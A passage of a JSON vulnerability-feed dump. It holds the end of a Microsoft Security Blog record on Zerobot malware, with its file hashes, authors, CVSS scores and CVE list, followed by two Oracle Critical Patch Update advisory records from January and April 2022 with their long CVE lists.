13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2022-04-14T23:28:54", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 497 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2832416.1>).\n\n**Please note that on December 10, 2021, Oracle released a Security Alert for Apache Log4j vulnerabilities [CVE-2021-44228 and CVE-2021-45046](<https://www.oracle.com/security-alerts/alert-cve-2021-44228.html>). Customers should review the Alert if they have not already done so.**\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29582", "CVE-2022-21353", "CVE-2022-23302", "CVE-2022-21259", "CVE-2022-21267", "CVE-2021-36090", "CVE-2020-12723", "CVE-2022-21328", "CVE-2021-42575", "CVE-2021-41164", "CVE-2021-30369", "CVE-2022-21275", "CVE-2021-39145", "CVE-2022-21356", "CVE-2022-21243", "CVE-2021-25122", "CVE-2022-21253", "CVE-2021-3448", "CVE-2016-7103", "CVE-2021-39148", "CVE-2022-21399", "CVE-2020-11023", "CVE-2021-28163", "CVE-2020-7712", "CVE-2020-9484", "CVE-2022-21258", "CVE-2022-21251", "CVE-2020-14340", "CVE-2019-11358", "CVE-2022-21244", "CVE-2022-21296", "CVE-2020-36184", "CVE-2022-21282", "CVE-2021-22897", "CVE-2022-21395", "CVE-2022-21367", "CVE-2021-36160", "CVE-2021-32013", "CVE-2022-21354", "CVE-2021-2371", "CVE-2021-3177", "CVE-2021-44832", "CVE-2022-21358", "CVE-2021-26691", "CVE-2020-13935", "CVE-2022-23305", "CVE-2021-32012", "CVE-2020-11022", "CVE-2022-21278", "CVE-2022-21273", "CVE-2022-21389", "CVE-2022-21346", "CVE-2020-10683", "CVE-2021-44228", "CVE-2022-21345", "CVE-2020-14756", "CVE-2022-21374", "CVE-2022-21316", "CVE-2021-3517", "CVE-2020-8554", "CVE-2022-21364", "CVE-2021-22931", "CVE-2021-3712", "CVE-2020-35728", "CVE-2021-39146", "CVE-2020-17527", "CVE-2022-21247", "CVE-2021-30639", "CVE-2021-23440", "CVE-2022-21256", "CVE-2022-21397", "CVE-2022-21362", "CVE-2022-21265", "CVE-2021-32014", "CVE-2021-35516", "CVE-2021-45105", "CVE-2021-22939", "CVE-2020-36182", "CVE-2022-21276", "CVE-2021-32827", "CVE-2021-2428", "CVE-2019-17566", "CVE-2021-21705", "CVE-2021-22947", "CVE-2022-21355", "CVE-2021-22959", "CVE-2020-8284", "CVE-2022-21280", "CVE-2021-29425", "CVE-2022-21252", "CVE-2019-10219", "CVE-2019-10086", "CVE-2022-21295", "CVE-2022-21359", "CVE-2022-21257", "CVE-2021-39147", "CVE-2022-21339", "CVE-2021-39140", "CVE-2020-15824", "CVE-2021-39154", "CVE-2022-21400", "CVE-2022-21303", "CVE-2022-21314", "CVE-2022-21308", "CVE-2020-36181", "CVE-2022-21373", "CVE-2021-22925", "CVE-2022-21309", "CVE-2022-21294", "CVE-2022-21313", "CVE-2022-21333", "CVE-2022-21299", "CVE-2021-33560", "CVE-2022-21285", "CVE-2022-21297", "CVE-2022-21325", "CVE-2022-21283", "CVE-2020-5421", "CVE-2022-21255", "CVE-2022-21322", "CVE-2020-28052", "CVE-2022-21394", "CVE-2021-34798", "CVE-2022-21326", "CVE-2021-43395", "CVE-2022-21301", "CVE-2021-23336", "CVE-2022-21289", "CVE-2020-17530", "CVE-2021-32723", "CVE-2021-35517", "CVE-2022-21306", "CVE-2020-36186", "CVE-2020-10543", "CVE-2020-13949", "CVE-2022-21386", "CVE-2022-21242", "CVE-2018-1324", "CVE-2022-21388", "CVE-2022-21334", "CVE-2021-33909", "CVE-2022-21398", "CVE-2022-21270", "CVE-2020-14642", "CVE-2021-3326", "CVE-2022-21366", "CVE-2022-21342", "CVE-2021-32809", "CVE-2021-23840", "CVE-2022-21248", "CVE-2019-13734", "CVE-2022-21341", "CVE-2021-39153", "CVE-2022-21372", "CVE-2020-5258", "CVE-2022-21365", "CVE-2019-17495", "CVE-2022-21305", "CVE-2021-39152", "CVE-2022-21382", "CVE-2022-21352", "CVE-2020-28469", "CVE-2020-9281", "CVE-2022-21246", "CVE-2021-38153", "CVE-2020-11979", "CVE-2022-21370", "CVE-2021-39150", "CVE-2021-34429", "CVE-2021-29923", "CVE-2022-21291", "CVE-2021-41773", "CVE-2020-17521", "CVE-2022-21338", "CVE-2021-27568", "CVE-2022-21272", "CVE-2022-21378", "CVE-2021-37137", "CVE-2022-21391", "CVE-2021-2277", "CVE-2022-21375", "CVE-2022-21300", "CVE-2021-36373", "CVE-2021-35043", "CVE-2022-21381", "CVE-2021-21409", "CVE-2022-21245", "CVE-2021-3541", "CVE-2022-21260", "CVE-2022-21323", "CVE-2022-21369", "CVE-2021-41524", "CVE-2022-21387", "CVE-2022-21402", "CVE-2021-36690", "CVE-2020-8285", "CVE-2020-1945", "CVE-2022-21350", "CVE-2022-21290", "CVE-2022-21304", "CVE-2021-36221", "CVE-2022-21330", "CVE-2021-32808", "CVE-2021-35683", "CVE-2021-3426", "CVE-2020-36185", "CVE-2020-25649", "CVE-2022-21320", "CVE-2022-21288", "CVE-2020-2934", "CVE-2021-31812", "CVE-2022-21371", "CVE-2022-21349", "CVE-2021-22118", "CVE-2022-21266", "CVE-2020-11987", "CVE-2021-22898", "CVE-2022-21307", "CVE-2022-21271", "CVE-2022-21310", "CVE-2022-21279", "CVE-2022-21377", "CVE-2021-31684", "CVE-2022-21340", "CVE-2021-35687", "CVE-2020-35490", "CVE-2022-21277", "CVE-2022-21401", "CVE-2021-28164", "CVE-2021-3711", "CVE-2020-36188", "CVE-2020-36180", "CVE-2021-39139", "CVE-2022-21286", "CVE-2021-3634", "CVE-2021-33193", "CVE-2021-42013", "CVE-2021-44224", "CVE-2020-13936", "CVE-2022-21368", "CVE-2022-21287", "CVE-2022-21293", "CVE-2022-21392", "CVE-2022-21312", "CVE-2021-40438", "CVE-2021-22940", "CVE-2021-29921", "CVE-2020-8203", "CVE-2022-21274", "CVE-2022-21363", "CVE-2022-21376", "CVE-2022-21292", "CVE-2020-24616", "CVE-2022-21250", "CVE-2020-13817", "CVE-2022-21344", "CVE-2020-36187", "CVE-2022-21264", "CVE-2021-22946", "CVE-2022-21249", "CVE-2021-30640", "CVE-2022-21284", "CVE-2022-21317", "CVE-2021-28169", "CVE-2020-24750", "CVE-2022-21269", "CVE-2021-37136", "CVE-2022-21336", "CVE-2022-21348", "CVE-2022-21396", "CVE-2021-44790", "CVE-2022-21379", "CVE-2022-21324", "CVE-2020-35491", "CVE-2022-21361", "CVE-2021-22924", "CVE-2021-35587", "CVE-2022-21262", "CVE-2020-13934", "CVE-2022-21254", "CVE-2021-21783", "CVE-2021-35515", "CVE-2022-21281", "CVE-2018-11771", "CVE-2021-28165", "CVE-2019-17091", "CVE-2022-21329", "CVE-2022-21321", "CVE-2021-33037", "CVE-2021-22926", "CVE-2022-21332", "CVE-2021-35684", "CVE-2021-35686", "CVE-2022-21327", "CVE-2021-36374", "CVE-2021-35685", "CVE-2022-21383", "CVE-2021-33880", "CVE-2021-39149", "CVE-2022-21403", "CVE-2020-27618", "CVE-2022-21298", "CVE-2022-21318", "CVE-2022-21302", "CVE-2021-37695", "CVE-2020-36183", "CVE-2022-21380", "CVE-2021-39144", "CVE-2022-21360", "CVE-2021-39151", "CVE-2022-21319", "CVE-2021-39275", "CVE-2021-3516", "CVE-2021-34558", "CVE-2022-21337", "CVE-2021-2351", "CVE-2022-21357", "CVE-2020-6950", "CVE-2020-28500", "CVE-2022-21331", "CVE-2021-31811", "CVE-2021-23017", "CVE-2020-36189", "CVE-2022-21315", "CVE-2020-36179", "CVE-2022-21351", "CVE-2020-13956", "CVE-2022-21268", "CVE-2021-25329", "CVE-2022-23307", "CVE-2022-21390", "CVE-2021-42340", "CVE-2021-4104", "CVE-2021-22960", "CVE-2022-21347", "CVE-2021-34428", "CVE-2020-10878", "CVE-2020-8908", "CVE-2021-21703", "CVE-2022-21393", "CVE-2021-22119", "CVE-2021-41165", "CVE-2021-45046", "CVE-2022-21311", "CVE-2022-21263", "CVE-2021-37714", "CVE-2021-39141", "CVE-2018-1311", "CVE-2021-23337", "CVE-2021-22901", "CVE-2022-21261", "CVE-2021-2344", "CVE-2020-8177", "CVE-2022-21335", "CVE-2021-20718", "CVE-2021-29505"], "modified": "2022-03-14T00:00:00", "id": "ORACLE:CPUJAN2022", "href": "https://www.oracle.com/security-alerts/cpujan2022.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-17T19:57:10", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42392", "CVE-2022-21824", "CVE-2020-29582", "CVE-2022-21490", "CVE-2022-21476", "CVE-2020-11612", "CVE-2022-23302", "CVE-2019-16785", "CVE-2021-32792", "CVE-2021-36090", "CVE-2020-12723", "CVE-2021-41164", "CVE-2021-36087", "CVE-2021-39145", "CVE-2019-12086", "CVE-2020-15719", "CVE-2022-21445", "CVE-2020-10693", "CVE-2022-25236", "CVE-2022-21452", "CVE-2021-41099", "CVE-2021-41182", "CVE-2022-0391", "CVE-2021-39148", "CVE-2021-32626", "CVE-2019-10247", "CVE-2020-11023", "CVE-2022-22968", "CVE-2022-21483", "CVE-2020-13434", "CVE-2020-28196", "CVE-2019-16786", "CVE-2021-3518", "CVE-2021-36085", "CVE-2021-3580", "CVE-2020-14340", "CVE-2022-21477", "CVE-2022-21498", "CVE-2022-21449", "CVE-2020-36184", "CVE-2021-43527", "CVE-2022-21435", "CVE-2021-22897", "CVE-2022-21411", "CVE-2019-1003050", "CVE-2021-27807", "CVE-2021-36160", "CVE-2021-4182", "CVE-2022-21450", "CVE-2021-32762", "CVE-2022-21405", "CVE-2019-13057", "CVE-2019-17195", "CVE-2021-44832", "CVE-2022-21474", "CVE-2020-13935", "CVE-2022-23305", "CVE-2022-21422", "CVE-2021-36084", "CVE-2020-11022", "CVE-2019-18276", "CVE-2022-21446", "CVE-2019-20388", "CVE-2019-3740", "CVE-2021-3517", "CVE-2020-8554", "CVE-2018-1999007", "CVE-2022-21481", "CVE-2021-26291", "CVE-2021-3449", "CVE-2019-16789", "CVE-2021-3712", "CVE-2020-35728", "CVE-2019-13038", "CVE-2020-11080", "CVE-2021-32785", "CVE-2021-39146", "CVE-2019-3738", "CVE-2020-17527", "CVE-2018-1999001", "CVE-2021-25219", "CVE-2022-21454", "CVE-2022-21420", "CVE-2022-23437", "CVE-2022-21409", "CVE-2021-35516", "CVE-2021-45105", "CVE-2020-5413", "CVE-2020-36182", "CVE-2021-28170", "CVE-2020-36242", "CVE-2021-4160", "CVE-2022-21451", "CVE-2022-22947", "CVE-2022-21491", "CVE-2021-22947", "CVE-2021-3690", "CVE-2022-21404", "CVE-2019-10383", "CVE-2020-8284", "CVE-2020-14155", "CVE-2021-29425", "CVE-2022-20613", "CVE-2019-10086", "CVE-2018-1999004", "CVE-2021-22144", "CVE-2022-23221", "CVE-2022-22963", "CVE-2021-39147", "CVE-2021-35942", "CVE-2022-23181", "CVE-2019-17571", "CVE-2021-39140", "CVE-2021-39154", "CVE-2022-21430", "CVE-2022-21421", "CVE-2020-36181", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-20615", "CVE-2021-3520", "CVE-2019-18218", "CVE-2021-3156", "CVE-2020-10531", "CVE-2022-21480", "CVE-2021-33560", "CVE-2020-28895", "CVE-2020-8174", "CVE-2020-15250", "CVE-2022-21497", "CVE-2018-8032", "CVE-2020-5421", "CVE-2020-28052", "CVE-2021-22134", "CVE-2021-34798", "CVE-2021-22569", "CVE-2021-43395", "CVE-2021-3572", "CVE-2018-1999002", "CVE-2019-20916", "CVE-2020-17530", "CVE-2021-35517", "CVE-2019-3739", "CVE-2022-21486", "CVE-2020-36186", "CVE-2020-1968", "CVE-2020-10543", "CVE-2021-3200", "CVE-2019-13750", "CVE-2022-23990", "CVE-2021-33813", "CVE-2020-29363", "CVE-2021-3450", "CVE-2018-1285", "CVE-2021-23840", "CVE-2022-21472", "CVE-2021-39153", "CVE-2018-1999005", "CVE-2021-22132", "CVE-2022-21469", "CVE-2022-21494", "CVE-2022-25314", "CVE-2021-39152", "CVE-2022-21461", "CVE-2021-41973", "CVE-2020-7760", "CVE-2021-3807", "CVE-2021-20231", "CVE-2020-14343", "CVE-2019-14862", "CVE-2022-21485", "CVE-2021-38153", "CVE-2020-5245", "CVE-2020-11979", "CVE-2021-23839", "CVE-2022-21492", "CVE-2021-28168", "CVE-2018-1000195", "CVE-2021-39150", "CVE-2020-36518", "CVE-2021-34429", "CVE-2019-16792", "CVE-2020-17521", "CVE-2019-20838", "CVE-2021-27568", "CVE-2022-21467", "CVE-2021-37137", "CVE-2022-21375", "CVE-2022-21442", "CVE-2021-36373", "CVE-2021-35043", "CVE-2018-1000193", "CVE-2021-21409", "CVE-2021-42717", "CVE-2020-25659", "CVE-2018-11212", "CVE-2021-30129", "CVE-2019-10384", "CVE-2022-22721", "CVE-2020-8285", "CVE-2022-21475", "CVE-2021-32791", "CVE-2022-21458", "CVE-2020-16135", "CVE-2022-21716", "CVE-2021-2471", "CVE-2022-21466", "CVE-2020-8231", "CVE-2018-2601", "CVE-2020-36185", "CVE-2020-1971", "CVE-2020-25649", "CVE-2021-3537", "CVE-2022-21462", "CVE-2021-41183", "CVE-2021-31812", "CVE-2021-21295", "CVE-2022-21468", "CVE-2021-22145", "CVE-2021-22118", "CVE-2022-21471", "CVE-2021-44532", "CVE-2021-4185", "CVE-2022-21426", "CVE-2021-22898", "CVE-2022-20612", "CVE-2022-21271", "CVE-2021-20232", "CVE-2021-4034", "CVE-2021-44533", "CVE-2020-35490", "CVE-2021-20289", "CVE-2021-3711", "CVE-2020-36188", "CVE-2020-36180", "CVE-2021-39139", "CVE-2022-21487", "CVE-2021-33193", "CVE-2022-25315", "CVE-2021-42013", "CVE-2021-44224", "CVE-2020-13936", "CVE-2021-32786", "CVE-2022-22719", "CVE-2022-21484", "CVE-2020-13435", "CVE-2021-31799", "CVE-2022-21415", "CVE-2022-22720", "CVE-2021-40438", "CVE-2020-7595", "CVE-2021-2427", "CVE-2020-9488", "CVE-2021-32687", "CVE-2020-11971", "CVE-2018-6356", "CVE-2020-7226", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21423", "CVE-2021-22096", "CVE-2021-2464", "CVE-2021-30468", "CVE-2021-29921", "CVE-2021-31810", "CVE-2020-8172", "CVE-2020-8203", "CVE-2021-4181", "CVE-2022-21434", "CVE-2018-1000067", "CVE-2021-41184", "CVE-2020-24616", "CVE-2022-21410", "CVE-2022-21441", "CVE-2020-36187", "CVE-2021-22946", "CVE-2021-28169", "CVE-2020-24750", "CVE-2020-8277", "CVE-2021-37136", "CVE-2021-44790", "CVE-2020-35491", "CVE-2022-21413", "CVE-2018-1000068", "CVE-2021-23841", "CVE-2021-43797", "CVE-2022-21448", "CVE-2021-32628", "CVE-2019-12402", "CVE-2022-21436", "CVE-2021-32066", "CVE-2021-35515", "CVE-2020-27218", "CVE-2022-21478", "CVE-2022-25235", "CVE-2021-28657", "CVE-2022-21431", "CVE-2022-23852", "CVE-2022-21453", "CVE-2021-33037", "CVE-2022-21418", "CVE-2021-32672", "CVE-2021-35574", "CVE-2022-21493", "CVE-2019-13565", "CVE-2022-21412", "CVE-2020-8286", "CVE-2018-1000192", "CVE-2021-3445", "CVE-2021-36374", "CVE-2021-32627", "CVE-2022-25313", "CVE-2021-33880", "CVE-2022-24329", "CVE-2021-39149", "CVE-2022-21384", "CVE-2018-1999003", "CVE-2019-14822", "CVE-2021-33574", "CVE-2022-21427", "CVE-2020-15358", "CVE-2022-21482", "CVE-2022-21470", "CVE-2020-36183", "CVE-2017-17740", "CVE-2022-21438", "CVE-2021-39144", "CVE-2021-39151", "CVE-2021-27645", "CVE-2022-22965", "CVE-2022-0778", "CVE-2019-3799", "CVE-2022-21437", "CVE-2021-21275", "CVE-2022-21457", "CVE-2022-21473", "CVE-2021-22696", "CVE-2019-19603", "CVE-2022-21496", "CVE-2022-21416", "CVE-2021-39275", "CVE-2022-21417", "CVE-2022-21425", "CVE-2021-2351", "CVE-2019-13751", "CVE-2020-6950", "CVE-2021-31811", "CVE-2021-32675", "CVE-2021-23017", "CVE-2020-36189", "CVE-2021-43859", "CVE-2019-12399", "CVE-2022-21459", "CVE-2022-21440", "CVE-2017-9287", "CVE-2020-36179", "CVE-2020-13956", "CVE-2022-21488", "CVE-2022-23307", "CVE-2021-23450", "CVE-2021-42340", "CVE-2017-1000353", "CVE-2022-21479", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-3521", "CVE-2021-43818", "CVE-2020-10878", "CVE-2017-14159", "CVE-2022-21419", "CVE-2018-1000194", "CVE-2022-21414", "CVE-2021-27906", "CVE-2020-8908", "CVE-2022-21460", "CVE-2021-21703", "CVE-2019-1003049", "CVE-2021-36086", "CVE-2020-12243", "CVE-2022-20614", "CVE-2021-41165", "CVE-2021-22570", "CVE-2019-0227", "CVE-2020-24977", "CVE-2021-37714", "CVE-2021-4183", "CVE-2019-5827", "CVE-2022-21489", "CVE-2021-21290", "CVE-2021-39141", "CVE-2020-35198", "CVE-2021-22901", "CVE-2022-21447", "CVE-2021-4184", "CVE-2022-21465", "CVE-2022-21424", "CVE-2021-44531", "CVE-2020-25638", "CVE-2021-29505", "CVE-2022-23943", "CVE-2021-41617"], "modified": "2022-06-16T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}